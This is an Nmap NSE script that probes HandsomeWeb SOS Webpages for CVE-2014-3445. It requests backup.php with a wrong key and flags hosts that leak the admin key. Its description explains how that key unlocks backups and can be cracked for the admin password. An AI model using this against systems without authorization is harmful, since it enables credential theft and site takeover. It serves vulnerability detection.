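local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local vulns = require "vulns"

description = [[
Tests for the CVE-2014-3445 vulnerability in HandsomeWeb SOS Webpages,
which allows an unauthenticated user to access administrative functions,
such as backing up of key files within the CMS.

This is done by appending the following to a domain using the software
affected.

/backup.php?a=2&k=somerandomkey

Where "a" is the file number to back up and "k" is the MD5 key used to
authenticate the administrator; however, if "k" does not match the
correct key, rather than denying the backup to the unauthenticated user,
the service will provide the user with the correct key.

For example:

"Failure, wrong key. The right key is 5f17aca1ae2edea0f145e884116371a5"

Using this new key in the URL above will allow the user to perform the
backup of files. In addition to this, the key is generated by the code
md5(ADMIN_USERNAME.md5(admin_password)), so the disclosed key is a hash
of the admin credentials that can be cracked offline to recover the admin
password and gain further control over the site.

References:
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-3445/
]]

---
-- @usage
-- nmap -sV --script http-vuln-cve2014-3445 <target>
--
-- @output
-- PORT   STATE SERVICE REASON
-- 80/tcp open  http    syn-ack
-- | http-vuln-cve2014-3445.nse:
-- |   VULNERABLE:
-- |   Unauthenticated Backup and Password Disclosure in HandsomeWeb SOS Webpages
-- |     State: VULNERABLE (Exploitable)
-- |     Description:
-- |       A vulnerability that allows an unauthenticated user to access
-- |       administrative functions such as backing up of key files within
-- |       the CMS. In addition, the vulnerability exposes the MD5 of the
-- |       admin username and password, which makes it possible to gain full
-- |       control over the site.
-- |
-- |     Affected versions: v1.1.11 and earlier.
-- |     Disclosure date: 26-05-2014
-- |     References:
-- |       https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-3445/
-- |_
--
---

author = "Claudiu Perta "
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"exploit", "vuln", "intrusive"}

portrule = shortport.http

--- Probe backup.php with a deliberately wrong key and report EXPLOIT if the
-- server echoes the correct key back (the CVE-2014-3445 behaviour).
-- No backup is triggered: the wrong key makes the server refuse the action,
-- the script only inspects the refusal message.
-- @param host the host table supplied by Nmap
-- @param port the port table supplied by Nmap
-- @return the vulns report output for this host/port
action = function(host, port)
  local vuln = {
    title = 'Unauthenticated Backup and Password Disclosure in HandsomeWeb SOS Webpages',
    IDS = { CVE = 'CVE-2014-3445' },
    state = vulns.STATE.NOT_VULN, -- default
    description = [[
A vulnerability that allows an unauthenticated user to access
administrative functions such as backing up of key files within
the CMS. In addition, the vulnerability exposes the MD5 of the
admin username and password, which makes it possible to gain full
control over the site.

Affected versions: v1.1.11 and earlier.
Vulnerability discovered by Freakyclown.
    ]],
    references = {
      'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-3445/',
    },
    dates = {
      disclosure = { year = '2014', month = '05', day = '26' },
    },
  }

  local report = vulns.Report:new(SCRIPT_NAME, host, port)

  -- "somerandomkey" is intentionally not a valid key: a patched server
  -- simply rejects it, a vulnerable one leaks the right key in its reply.
  local uri = "/backup.php?a=2&k=somerandomkey"
  local response = http.get(host, port, uri)

  -- http.get may return a table without a body on transport errors, so
  -- check the body exists before calling string methods on it.
  if response and response.body then
    -- Capture only the hex digest that follows the phrase, so the match is
    -- tied to the actual disclosure and not to any page containing the words.
    local key = response.body:match("The right key is (%x+)")
    if key == nil then
      stdnse.print_debug(1, "%s: Unknown response", SCRIPT_NAME)
    else
      stdnse.print_debug(1, "Matched key :%s", key)
      vuln.state = vulns.STATE.EXPLOIT
    end
  else
    stdnse.print_debug(1, "%s: No response body for %s", SCRIPT_NAME, uri)
  end

  return report:make_output(vuln)
end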